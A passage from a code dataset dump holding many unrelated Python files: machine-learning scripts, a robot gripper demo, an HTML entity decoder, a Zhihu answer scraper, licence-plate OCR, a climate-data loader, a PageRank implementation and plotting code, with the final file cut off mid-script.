X.reshape(2637,96*96)\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\n\r\n# Fitting Random Forest Classification to the Training set\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nclassifier = RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 0)\r\nclassifier.fit(X_train, y_train)\r\n\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\n\r\n# Making the Confusion Matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(y_test, y_pred)\r\n\r\nimport pickle\r\n\r\n# save\r\nwith open('modelrandomforest.pkl','wb') as f4:\r\n pickle.dump(classifier,f4)\r\n\r\n# load\r\nwith open('modelrandomforest.pkl', 'rb') as f4:\r\n clf4 = pickle.load(f4)\r\n\r\n","sub_path":"RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98480643","text":"#!/usr/bin/env python3\n\n# A basic example of using BlueInterface for gripper control.\n# It allows a user to open and close the gripper.\n\nimport sys\nfrom blue_interface import BlueInterface\nimport numpy as np\nimport consts\n\nif __name__ == '__main__':\n blue = BlueInterface(consts.default_arm, consts.default_address) #creates object of class KokoInterface at the IP in quotes with the name 'blue'\n opened = True\n try:\n while True:\n input(\"Press enter to open/close the gripper. To exit, press .\")\n\n if opened:\n blue.command_gripper(-1.5,20.0)\n print(\"Closing...\")\n else:\n blue.command_gripper(0.0,10.0)\n print(\"Opening...\")\n opened = not opened\n except:\n pass\n\n blue.disable_control()\n blue.shutdown()\n\n","sub_path":"demos/gripper_controller.py","file_name":"gripper_controller.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"199716797","text":"import re\r\n\r\ndef __decode_entity_references_into_utf8(entity_references):\r\n num_list = re.findall(r'\\&#(\\d+);',entity_references)\r\n \r\n code = 0\r\n for n in num_list:\r\n if code == 0:\r\n code = int(n)\r\n else:\r\n code = code << 8 | int(n)\r\n\r\n if len(num_list) == 1:\r\n char = chr(code)\r\n else:\r\n char = code.to_bytes(len(num_list),'big').decode('utf-8')\r\n \r\n return char\r\n\r\ndef __make_mojibake_char(entity_references):\r\n num_list = re.findall(r'\\&#(\\d+);',entity_references)\r\n \r\n for n in num_list:\r\n print('_{}'.format(chr(int(n))))\r\n\r\ndef __get_entity_references(html):\r\n return re.findall(r'((?:\\&#\\d+;)+)',html)\r\n\r\ndef __get_dict_of_entity_reference_and_utf8(ref_list):\r\n utf8_dict = {}\r\n for ref in ref_list:\r\n char = __decode_entity_references_into_utf8(ref)\r\n\r\n # convert nbsp into space\r\n if char == '\\xa0':\r\n char = ' '\r\n\r\n utf8_dict[ref] = char\r\n \r\n return utf8_dict\r\n\r\n\r\ndef change_entity_references_to_utf8_in_text(text):\r\n ref_list = __get_entity_references(text)\r\n utf8_dict = __get_dict_of_entity_reference_and_utf8(ref_list)\r\n\r\n replace_text = text\r\n for ref, utf8 in utf8_dict.items():\r\n replace_text = replace_text.replace(ref, utf8)\r\n \r\n return replace_text\r\n\r\nif __name__=='__main__':\r\n \r\n html = '''
The three-dimensional structures of chromosomes are increasingly being recognized\r\n as playing a major role in cellular regulatory states. The efficiency and promiscuity\r\n of phage Mu transposition was exploited to directly measure\r\n in vivo interactions between genomic loci in\r\n E. coli. Two global organizing principles have emerged: first, the chromosome is well-mixed\r\n and uncompartmentalized, with transpositions occurring freely between all measured\r\n loci; second, several gene families/regions show “clustering”: strong three-dimensional\r\n co-localization regardless of linear genomic distance. The activities of the SMC/condensin\r\n protein MukB and nucleoid-compacting protein subunit HU-α; are essential for the well-mixed\r\n state; HU-α; is also needed for clustering of 6/7 ribosomal RNA-encoding loci. The\r\n data are explained by a model in which the chromosomal structure is driven by dynamic\r\n competition between DNA replication and chromosomal relaxation, providing a foundation\r\n for determining how region-specific properties contribute to both chromosomal structure\r\n and gene regulation.\r\n
'''\r\n \r\n ref_list = __get_entity_references(html)\r\n utf8_dict = __get_dict_of_entity_reference_and_utf8(ref_list)\r\n","sub_path":"src/entity_references.py","file_name":"entity_references.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"575837131","text":"from src.program import controller_commands\nfrom src.terminal import ITerminal as terminal\n\n\nclass Navigator:\n def __init__(self, *args, **kwargs):\n self.controller_commands = controller_commands\n\n def wait_for_command(self):\n last = len(self.controller_commands) - 1\n self.controller_commands[last].commands[0].run()\n while True:\n command = terminal.read_command()\n self.navigate(command)\n\n def navigate(self, command):\n called = False\n command_arguments = ('%s' % command).split(' ', 1)\n command = ('%s' % command_arguments[0]).strip()\n arguments = ''\n try:\n arguments = ('%s' % command_arguments[1]).strip()\n except:\n pass\n for cc in self.controller_commands:\n for c in cc.commands:\n if not called and c.call_name == command:\n c.run(arguments)\n called = True\n if not called:\n terminal.error('Command not found')\n\n\nINavigator = Navigator()\n","sub_path":"src/navigator.py","file_name":"navigator.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"222301595","text":"\nimport requests\nimport json\nimport csv\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nimport random\n\ncount = 1\n\nurl = 'https://www.zhihu.com/api/v4/questions/28997505/answers'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36'\n}\n\n\ndef open_url(url):\n try:\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n return response.text\n else:\n return None\n except Exception as e:\n print(e)\n return None\n\n# json.loads() change to dict\n\n\ndef parse_json(data):\n res = json.loads(data)\n\n print(res, 'res')\n\n global count\n\n for an in res['data']:\n if an['type'] == 'answer':\n # question = an['question']['title']\n # soup = BeautifulSoup(an['content'],\n # features='html.parser')\n\n # answer = soup.text.strip().replace('\\n', '。')\n # vote = an['target']['voteup_count']\n\n # get user\n name = an['author']['name']\n headline = an['author']['headline']\n gender = an['author']['gender']\n write_user_csv(\n {'name': name, 'headline': headline, 'gender': gender})\n count += 1\n\n return get_next_url(res)\n\n\ndef get_next_url(res):\n try:\n if not res['paging']['is_end']:\n url = res['paging']['next']\n write_url_csv(res['paging'])\n return url\n else:\n return None\n except Exception as e:\n print(e)\n return None\n\n\ndef write_url_csv(item):\n with open('url.csv', 'a', encoding='utf_8_sig', newline='') as f:\n fieldnames = ['is_start', 'is_end', 'previous', 'next', 'totals']\n w = csv.DictWriter(f, fieldnames=fieldnames)\n w.writerow(item)\n\n\ndef write_user_csv(item):\n with open('user.csv', 'a', encoding='utf_8_sig', newline='') as f:\n fieldnames = ['name', 'headline', 'gender']\n w = csv.DictWriter(f, fieldnames=fieldnames)\n w.writerow(item)\n\n\nif __name__ == \"__main__\":\n count = 1\n\n while True:\n try:\n data = open_url(url)\n if data:\n url = parse_json(data)\n if not url:\n print('end')\n break\n except Exception as e:\n print(e)\n sleep(random.random()*3)\n","sub_path":"requests/zhihu/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"559451423","text":"import cv2\r\nimport pytesseract\r\nimport numpy as np\r\nimport imutils\r\n\r\nimg = cv2.imread(\"licence_plate.jpg\")\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nfiltered = cv2.bilateralFilter(gray, 6, 250, 250)\r\nedged = cv2.Canny(filtered, 30, 200)\r\ncontours = cv2.findContours(edged, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(contours)\r\ncnts = sorted(cnts, key=cv2.contourArea, reverse=True)[0:10] # koordinatları alanlarına göre tersten sıralar\r\nscreen = None\r\n\r\n# konturlardaki hataları en aza indirmek icin\r\nfor c in cnts:\r\n epsilon = 0.018 * cv2.arcLength(c, True) # deneysel bir sayi #yayların uzunlugunu bulur,bosluk yoksa devam et\r\n approx = cv2.approxPolyDP(c, epsilon, True)\r\n if len(approx) == 4: # dört köse algıladıysa screen esitle\r\n screen = approx\r\n break\r\n\r\nmask = np.zeros(gray.shape, np.uint8)\r\nnew_image = cv2.drawContours(mask, [screen], 0, (255, 255, 255), -1) # plaka dısında her yer siyah plaka beyaz\r\nnew_image = cv2.bitwise_and(img,img,mask = mask) #yaziyi yapistirma\r\n\r\n\r\n\r\n#kirpma islemi\r\n(x,y) = np.where(mask == (255))\r\n(topx,topy) = (np.min(x),np.min(y))\r\n(bottomx,bottomy) =(np.max(x),np.max(y))\r\ncropped = gray[topx:bottomx +1,topy:bottomy+1]\r\n\r\n\r\ntext = pytesseract.image_to_string(cropped,lang=\"eng\")\r\nprint(\"detected_plate\",text)\r\n\r\ncv2.imshow(\"original\",img)\r\ncv2.imshow(\"gray\",gray)\r\ncv2.imshow(\"filtered\",filtered)\r\ncv2.imshow(\"edged\",edged)\r\ncv2.imshow(\"new_image\", cropped)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"licence_plate_detection.py","file_name":"licence_plate_detection.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"21499919","text":"import xarray as xr\nimport pandas as pd\nimport numpy as np\n\ndef load_day(day, no_NNs, path, data_source='narval', resolution_narval='R02B04'):\n '''\n We load data from path from a given day. The data is saved in a folder per variable manner.\n This function returns an array of dataframes, where each dataframe corresponds to a specific vertical layer\n \n Parameters:\n day (string): The data of which day should we load (YYYYMMDD00 for narval, YYYYMMDD for qubicc)\n no_NNs (int): How many NNs do we want to train (= one per vertical layer)\n path (string): Path to the data\n data_source (string): 'narval' or 'qubicc'\n resolution_narval: 'R02B04' or 'R02B05'. Affects which fr_lake file is loaded.\n \n Returns:\n dfs: An array of no_NNs many dataframes, each providing training data for clc on a specific vertical layer\n '''\n day = str(day) # In case it wasn't passed as a string\n \n # Create DataFrame for loaded data\n if data_source == 'narval':\n vars_3d = ['qv', 'qc', 'qi', 'temp', 'pres', 'rho', 'zg']\n # vars_2d = ['fr_lake', 'fr_seaice']\n vars_prev = ['clc_prev']\n output = ['clc']\n elif data_source == 'qubicc':\n vars_3d = ['hus', 'clw', 'cli', 'ta', 'pfull', 'rho', 'zg']\n # vars_2d = ['fr_lake', 'fr_seaice']\n vars_prev = ['cl_prev'] \n output = ['cl']\n vars_2d = ['fr_lake']\n columns = [] \n for s in vars_3d:\n columns.append(s+'_i-2')\n columns.append(s+'_i-1')\n columns.append(s+'_i')\n columns.append(s+'_i+1')\n columns.append(s+'_i+2')\n columns.extend(vars_2d)\n columns.extend(vars_prev)\n columns.extend(output)\n \n dfs = []\n for i in range(no_NNs):\n dfs.append(pd.DataFrame(columns=columns))\n\n ## Output\n #clc\n vars = output\n for i in range(len(vars)):\n # Filenames depend on data-source\n if data_source == 'narval':\n # clc-filename narval: int_var_clc_R02B04_NARVALI_2013123100_cloud_DOM01_0036.nc\n clc_filenames = '/int_var_'+vars[i]+'_'+resolution_narval+'*'+day+'*_cloud_DOM01_00*.nc'\n elif data_source == 'qubicc':\n # cl-filename qubicc: int_var_hc2_02_p1m_cl_ml_20041110T110000Z.nc\n clc_filenames = '/int_var_hc2_02_p1m_'+vars[i]+'_ml_'+day+'*.nc'\n DS = xr.open_mfdataset(path+vars[i]+clc_filenames, combine='by_coords')\n var_array = getattr(DS, vars[i]).values\n not_nan = ~np.isnan(var_array[0,30,:]) #The surface-nearest layer 30 shall not contain NAN-values\n timesteps = var_array.shape[0] \n var_array_notnan = var_array[:,:,not_nan] #var_array_notnan.shape=25x31x1131\n # For every vertical layer we have to fill the output information of this day in the corresponding dataset\n for j in range(no_NNs):\n vert_layers = var_array.shape[1]\n # We are not interested in the uppermost layers (denoted by small indices)\n ind = vert_layers - no_NNs + j\n # We do not save the initial timestep as there is no preceding information on clc\n dfs[j][vars[i]] = np.reshape(var_array_notnan[1:,ind,:],[-1]) #shape=27144\n dfs[j][vars_prev[i]] = np.reshape(var_array_notnan[:-1,ind,:],[-1])\n \n ## Time-invariant input\n #zg\n DS = xr.open_dataset(path+'zg/zg_icon-a_capped.nc')\n var_array = DS.zg.values\n var_array_notnan = var_array[:,not_nan] #var_array_notnan.shape=31x1131\n var_array_notnan = np.repeat(np.expand_dims(var_array_notnan, 0), timesteps, axis=0) #var_array_notnan.shape=25x31x1131\n for j in range(no_NNs):\n ind = vert_layers - no_NNs + j\n dfs[j]['zg_i-2'] = np.reshape(var_array_notnan[1:,ind-2,:], [-1])\n dfs[j]['zg_i-1'] = np.reshape(var_array_notnan[1:,ind-1,:], [-1])\n dfs[j]['zg_i'] = np.reshape(var_array_notnan[1:,ind,:], [-1])\n try:\n dfs[j]['zg_i+1'] = np.reshape(var_array_notnan[1:,ind+1,:], [-1])\n dfs[j]['zg_i+2'] = np.reshape(var_array_notnan[1:,ind+2,:], [-1])\n except IndexError:\n pass\n \n #fr_lake\n if data_source == 'narval':\n DS = xr.open_dataset(path+'../grid_extpar/fr_lake_'+resolution_narval+'_NARVAL_fg_DOM01.nc')\n var_array = DS.FR_LAKE.values\n elif data_source == 'qubicc':\n DS = xr.open_dataset(path+'/fr_lake/fr_lake_'+resolution_narval+'.nc')\n var_array = DS.lake.values\n var_array = np.repeat(np.expand_dims(var_array, 0), timesteps, axis=0)\n var_array = np.repeat(np.expand_dims(var_array, 1), 31, axis=1)\n var_array_notnan = var_array[:,:,not_nan]\n for j in range(no_NNs):\n ind = vert_layers - no_NNs + j\n dfs[j]['fr_lake'] = np.reshape(var_array_notnan[1:,ind,:],[-1])\n \n# ## 2D input\n# #\n# vars = ['fr_seaice']\n# for i in range(len(vars)):\n# DS = xr.open_mfdataset(path+vars[i]+'/'+vars[i]+'_R02B04*'+day+'_fg_DOM01_00*.nc', \n# combine='by_coords')\n# var_array = getattr(DS, vars[i]).values\n# var_array = np.repeat(np.expand_dims(var_array, 1), 31, axis=1)\n# var_array_notnan = var_array[:,:,not_nan]\n# for j in range(no_NNs):\n# ind = vert_layers - no_NNs + j\n# dfs[j][vars[i]] = np.reshape(var_array_notnan[1:,ind,:],[-1])\n\n ## Hourly data\n #3D input\n vars = vars_3d\n vars.remove('zg')\n for i in range(len(vars)):\n # Filenames depend on data-source\n if data_source == 'narval':\n # 3d-filename narval: int_var_qc_R02B04_NARVALII_2016072800_fg_DOM01_0021.nc\n filenames = '/int_var_'+vars[i]+'_'+resolution_narval+'*'+day+'*_fg_DOM01_00*.nc'\n elif data_source == 'qubicc':\n # 3d-filename qubicc: int_var_hc2_02_p1m_clw_ml_20041110T090000Z.nc\n filenames = '/int_var_hc2_02_p1m_'+vars[i]+'_ml_'+day+'*.nc'\n DS = xr.open_mfdataset(path+vars[i]+filenames, combine='by_coords')\n if vars[i] == 'clw':\n var_array = getattr(DS, 'qclw_phy').values\n else:\n var_array = getattr(DS, vars[i]).values\n var_array_notnan = var_array[:,:,not_nan]\n for j in range(no_NNs):\n ind = vert_layers - no_NNs + j\n dfs[j][vars[i]+'_i-2'] = np.reshape(var_array_notnan[1:,ind-2,:], [-1])\n dfs[j][vars[i]+'_i-1'] = np.reshape(var_array_notnan[1:,ind-1,:], [-1])\n dfs[j][vars[i]+'_i'] = np.reshape(var_array_notnan[1:,ind,:], [-1])\n try:\n dfs[j][vars[i]+'_i+1'] = np.reshape(var_array_notnan[1:,ind+1,:], [-1])\n dfs[j][vars[i]+'_i+2'] = np.reshape(var_array_notnan[1:,ind+2,:], [-1])\n except IndexError:\n pass\n \n return dfs","sub_path":"n3_neighborhood_based_narval_r2b4/source_code/for_preprocessing.py","file_name":"for_preprocessing.py","file_ext":"py","file_size_in_byte":6796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"219710502","text":"'''\nAssignment 3 Programming SENG 474\nFile: question_2a.py\nAuthors: Luke Rowe, Luo Dai\nVersion: Final\n\nThis program runs the page rank algorithm on a dataset of 10000 nodes\n'''\n\n\nimport time\nfrom collections import deque\nimport numpy as np\n\n# number used to avoid division by 0\nSMALL_NUM = 0.0001\n\n'''\nThis function prepares data structures to hold data about the link structure \nwithout dead ends removed.\n\nparam(s): lines: list: list of lines from the input file\nret: nodes: set: set of nodes in the original link structure\n edges: set of tuples: set of ordered tuples (from_node,to_node) containing the \n edges in the link structure\n Np: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that link to the node_id of the key\n Nm: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that the key links to\n'''\ndef preprocess(lines):\n # set of nodes in the link structure\n nodes = set()\n edges = set()\n #dictionary of lists where Np[i] is a list of nodes that link to i\n Np = {}\n # dictionary of lists where N-[i] is a list of nodes that i links to\n Nm = {}\n\n for i in lines[4:]:\n if len(i.split('\\t')) == 2:\n # convert from tuple of strings to tuple of ints\n (from_node, to_node) = tuple(map(int, i.split('\\t')))\n edges.add((from_node, to_node))\n\n # append from_node to N^+[to_node]\n if to_node in Np.keys():\n Np[to_node].add(from_node)\n else:\n Np[to_node] = set([from_node])\n\n # append to_node to N^-[from_node]\n if from_node in Nm.keys():\n Nm[from_node].add(to_node)\n else:\n Nm[from_node] = set([to_node])\n\n # take the union of the keys in the Nm and Np dictionary\n # to get the set of nodes\n nodes = set(Np).union(set(Nm))\n for i in set(Np).difference(set(Nm)):\n Nm[i] = set([])\n for i in set(Nm).difference(set(Np)):\n Np[i] = set([])\n\n return nodes, edges, Nm, Np\n\n'''\nThis function finds and returns the dead ends in the link structure\nparam(s): nodes: set: the set of nodes in the original link structure\n Np: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that link to the node_id of the key\n Nm: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that the key links to \nret: set: set of removed node_ids in removal order\n'''\ndef find_dead_ends(nodes, Nm, Np):\n # dictionary of out-degrees\n D = {}\n # queue of temporary dead ends\n q = deque([])\n\n # find out-degree of each node\n for node in nodes:\n D[node] = len(Nm[node])\n if D[node] == 0:\n q.append(node)\n\n # we make dead_end a dictionary so that we have fast tests for containment\n # and preservation of order (since python dictionaries are insertion ordered (after 3.7))\n dead_ends = {}\n\n while len(q) != 0:\n i = q.popleft()\n if i not in dead_ends.keys():\n dead_ends[i] = None\n for j in Np[i]:\n D[j] = D[j] - 1\n if D[j] == 0:\n q.append(j)\n\n # return the keys of the dead_ends in removal order\n return dead_ends.keys()\n\n'''\nThis function removes dead_ends from the data structures containing the graph\n\nparam(s): nodes: set: set of nodes in the original graph\n edges: set of tuples: set of ordered tuples (from_node,to_node) containing the \n edges in the original graph\n dead_ends: set: set of dead end nodes in the graph\nret: nodes: set: set of nodes in the updated graph\n edges: set of tuples: set of ordered tuples (from_node,to_node) containing the \n edges in the updated graph\n Np: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that link to the node_id of the key in the updated graph\n Nm: dict: dictionary indexed by node_id containing the node_id's of the nodes\n that the key links to in the updated graph\n'''\ndef update_graph(nodes, edges, dead_ends):\n # Nm, Np for graph without dead_ends\n Nm = {}\n Np = {}\n\n # remove the dead ends from the graph\n nodes.difference_update(dead_ends)\n\n # make copy of edges to iterate through\n edges_copy = edges.copy()\n\n # remove edges containing dead ends\n for (from_node, to_node) in edges_copy:\n if (to_node in dead_ends) or (from_node in dead_ends):\n edges.remove((from_node, to_node))\n\n # Nm and Np creates according to graph with no dead ends\n for (from_node, to_node) in edges:\n # append from_node to N^+[to_node]\n if to_node in Np.keys():\n Np[to_node].add(from_node)\n else:\n Np[to_node] = set([from_node])\n\n # append to_node to N^-[from_node]\n if from_node in Nm.keys():\n Nm[from_node].add(to_node)\n else:\n Nm[from_node] = set([to_node])\n\n # there may be nodes with no incoming edges that needs to be added to Np\n for i in set(Nm).difference(set(Np)):\n Np[i] = set([])\n\n # set the dead_end nodes to have no incoming or outgoing edges\n # so that we can compute pagerank scores of non_dead_end nodes and\n # still traverse through dead_end nodes\n for node in dead_ends:\n Np[node] = set([])\n Nm[node] = set([])\n\n return nodes, edges, Nm, Np\n\n'''\nThis function computes and returns the page rank scores for nodes in the updated graph.\n\nparam(s): v: ndarray: array containing page rank scores for each node in original graph\n D: ndarray: array containing outdegrees for each node in the updated_graph\n find_array_idx: dict: maps a node_id to the array index corresponding to that node\n find_node_id: dict: maps an array index to the node_id corresponding to that index\n N_with_de: int: number of nodes with dead ends\n N: int: number of nodes with dead_ends removed\nret: v: ndarray: arrray of updated pageranks scores (for non-dead_end nodes)\n'''\ndef page_rank(v, D, Np, find_array_idx, find_node_id, N_with_de, N):\n beta = 0.85\n T = 10\n\n # T= 10 epochs\n for epoch in range(T):\n # copy previous pagerank vector\n v_before = v.copy()\n # vector containing term inside the summation (of pagerank equation)\n inside_sum = v_before / D;\n #update v element-wise (to save memory)\n for i in range(N_with_de):\n sum = 0\n #sum over the edges that links to node_id and sum the \"inside_sum\" term\n for node_id in Np[find_node_id[i]]:\n sum += inside_sum[find_array_idx[node_id]]\n\n v[i] = beta * sum + (1/N) * (1 - beta)\n\n return v\n\n'''\nThis function computes and returns the page rank scores for the dead end nodes of the graph.\n\nparam(s): v: ndarray: array containing page rank scores for each node in original graph\n D_with_de: ndarray: array containing outdegrees for each node in the orig graph\n dead_ends : set: set of dead ends in the graph\n N_with_de: int number of nodes with dead ends\n find_array_idx: dict: maps a node_id to the array index corresponding to that node\nret: v: ndarray: arrray of updated pageranks scores (for dead_end nodes) \n'''\ndef page_rank_dead_ends(v, D_with_de, dead_ends, Np_with_de, find_array_idx):\n # assign dead_end page rank scores to 0 (as they were assigned arbitary values\n # in the computation of non_dead_end pagerank scores)\n for node in dead_ends:\n v[find_array_idx[node]] = 0\n\n # vector containing term inside the summation (of equation)\n inside_sum = v / D_with_de\n\n # compute page rank score in reverse removal order\n for node in reversed(list(dead_ends)):\n sum = 0\n for node_id in Np_with_de[node]:\n sum += inside_sum[find_array_idx[node_id]]\n v[find_array_idx[node]] = sum\n\n #make change to \"inside_sum\" array instead of recomputing entire array to save computation time\n inside_sum[find_array_idx[node]] = sum / D_with_de[find_array_idx[node]]\n\n return v\n\n\ndef main():\n f = open(\"./web-Google_10k.txt\", \"r\")\n output = open(\"./PR_10k.tsv\", \"w\")\n # list of lines of the input file\n lines = [line.rstrip('\\n') for line in f]\n # \"with_de\" means \"with dead ends\"\n nodes, edges, Nm_with_de, Np_with_de = preprocess(lines)\n\n # find the dead ends in the graph\n dead_ends = find_dead_ends(nodes, Nm_with_de, Np_with_de)\n\n # keep copy of the nodes with dead ends included\n nodes_with_de = nodes.copy()\n N_with_de = len(nodes_with_de)\n\n # remove the dead ends from the graph\n nodes, edges, Nm, Np = update_graph(nodes,edges,dead_ends)\n N = len(nodes)\n\n # we initialize all variables in one pass through nodes to save computation time\n #initial page rank score\n init_score = 1 / N\n #vector of page rank scores\n v = np.zeros(N_with_de)\n # vector of out-degrees for graph without dead_end nodes\n D = np.zeros(N_with_de)\n # vector of out-degrees for original link structure\n D_with_de = np.zeros(N_with_de)\n # dictionary that maps node ids to its corresponding array index\n find_array_idx = {}\n # dictionary that maps array indexes to its corresponding node id\n find_node_id = {}\n\n i = 0\n for node in nodes_with_de:\n D[i] = len(Nm[node])\n # set from 0 to 0.0001 to avoid future division by zero\n if D[i] == 0: D[i] = SMALL_NUM\n D_with_de[i] = len(Nm_with_de[node])\n if D_with_de[i] == 0: D_with_de[i] = SMALL_NUM\n\n v[i] = float(init_score)\n\n # assign array index/node_id mappings\n find_array_idx[node] = i\n find_node_id[i] = node\n i += 1\n\n # compute page-rank scores for all the non-dead_end nodes\n v = page_rank(v, D, Np, find_array_idx, find_node_id, N_with_de, N)\n v = page_rank_dead_ends(v, D_with_de, dead_ends, Np_with_de, find_array_idx)\n\n output_list = [None]*N_with_de\n i = 0\n for node_id in nodes_with_de:\n output_list[i] = (node_id, v[find_array_idx[node_id]])\n i+=1\n\n #list of nodes,pagerank score in descending order by pagerank score\n output_list = sorted(output_list, key=lambda x: x[1], reverse=True)\n\n #write to tsv file\n output.write(\"PageRank\" + \"\\t\" + \"Ids\\n\")\n for i in range(N_with_de):\n output.write(str(output_list[i][1]) + \"\\t\" + str(output_list[i][0]) + \"\\n\")\n\nif __name__ == \"__main__\":\n t0 = time.perf_counter()\n main()\n print(time.perf_counter() - t0)","sub_path":"Assignment3/question_2a.py","file_name":"question_2a.py","file_ext":"py","file_size_in_byte":10612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"269411718","text":"# Copyright 2021 Wechat Group, Tencent\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ir.node\nfrom backend.cppcode.nodegenerator.nodegenerator import NodeGenerator\nfrom backend.cppcode.common import get_cpp_constant_value\n\n\nclass Flatten(NodeGenerator):\n @classmethod\n def accept(cls, node: ir.node.Node):\n return isinstance(node, ir.node.base.Flatten)\n\n @property\n def code(self):\n str_s0 = [\"1u\"]\n for i in range(self.node.axis):\n str_s0.append(\"{inputs[0]}.shape({i})\".format(i=i, **self.fmt_dict))\n str_s1 = [\"1u\"]\n for i in range(self.node.axis, len(self.inputs[0].shape)):\n str_s1.append(\"{inputs[0]}.shape({i})\".format(i=i, **self.fmt_dict))\n shape = \"{\" + \" * \".join(str_s0) + \", \" + \" * \".join(str_s1) + \"}\"\n return \"tfcc::View<{outputs[0].dtype}> {outputs[0]}({inputs[0]}, tfcc::Shape({shape}));\\n\".format(\n shape=shape, **self.fmt_dict\n )\n","sub_path":"tfcc_code_generator/backend/cppcode/nodegenerator/base/flatten.py","file_name":"flatten.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"26569810","text":"# coordinates on x-axis\r\nwith open(\"points_for_interpolation.pr4\") as fx:\r\n lines = fx.read().splitlines()\r\npoints = [float(item) for item in lines]\r\n\r\n# Chebyshev points and values of polynomial there\r\nwith open(\"cheb_y.pr4\") as fy:\r\n lines = fy.read().splitlines()\r\nchebY = [float(item) for item in lines]\r\n\r\n# Equidistant points and values of polynomial there\r\nwith open(\"equidist_y.pr4\") as fy:\r\n lines = fy.read().splitlines()\r\nequidistY = [float(item) for item in lines]\r\n\r\n# Function graph\r\nxmin = -100.0\r\nxmax = 100.0\r\ndx = 0.001\r\n\r\nxlist = mlab.frange (xmin, xmax, dx)\r\nylist = [np.exp(-z * z) for z in xlist]\r\nplt.plot(xlist, ylist, 'r')\r\n\r\ntext = 'quadratic'\r\n\r\n# Chebyshev graph\r\nchebXarray = array(points)\r\nchebYarray = array(chebY)\r\nf = interpolate.interp1d(chebXarray, chebYarray, kind=text)\r\nxnew = np.linspace(chebXarray.min(), chebXarray.max())\r\n\r\n# Equidistant graph\r\nx_ = array(points)\r\ny_ = array(equidistY)\r\nF = interpolate.interp1d(x_, y_, kind=text)\r\nXnew = np.linspace(x_.min(), x_.max())\r\n\r\nplt.plot(xnew, f(xnew), 'g')\r\nplt.plot(Xnew, F(Xnew), 'b')\r\n\r\npylab.legend ( (\"f(x)\", \"Chebyshev\", \"Equidistant\") )\r\n\r\nplt.axis([-2, 2, 0, 2])\r\nplt.show()\r\n","sub_path":"Interpolation Polynomial graph.py","file_name":"Interpolation Polynomial graph.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"170619814","text":"from tensorflow.keras.applications import VGG16\n#from keras.datasets import mnist\n#from keras.utils import to_categorical\nfrom tensorflow.keras import models\nfrom tensorflow.keras.layers import Dense,Flatten,Dropout\nimport cv2\nimport numpy as np\nimport tensorflow.compat.v1 as tf_v1\nimport tensorflow as tf\nfrom tensorflow.keras import layers\n\ndata_dir = '/export/home/iceicehyhy/dataset/MNIST_224X224_3/train'\nimg_height = 224\nimg_width = 224\nbatch_size = 32\n\ntest_data_dir = '/export/home/iceicehyhy/dataset/MNIST_224X224_3/test'\n\ntf.debugging.set_log_device_placement(True)\n\ntry:\n # Specify an invalid GPU device\n with tf.device('/device:GPU:2'):\n train_ds = tf.keras.preprocessing.image_dataset_from_directory(\n data_dir,\n validation_split=0.2,\n labels = 'inferred',\n label_mode = 'int',\n color_mode = 'rgb',\n subset=\"training\",\n seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n val_ds = tf.keras.preprocessing.image_dataset_from_directory(\n data_dir,\n validation_split=0.2,\n labels = 'inferred',\n label_mode = 'int',\n color_mode = 'rgb',\n subset=\"validation\",\n seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n test_ds = tf.keras.preprocessing.image_dataset_from_directory(\n test_data_dir,\n labels = 'inferred',\n label_mode = 'int',\n color_mode = 'rgb',\n seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n normalization_layer = 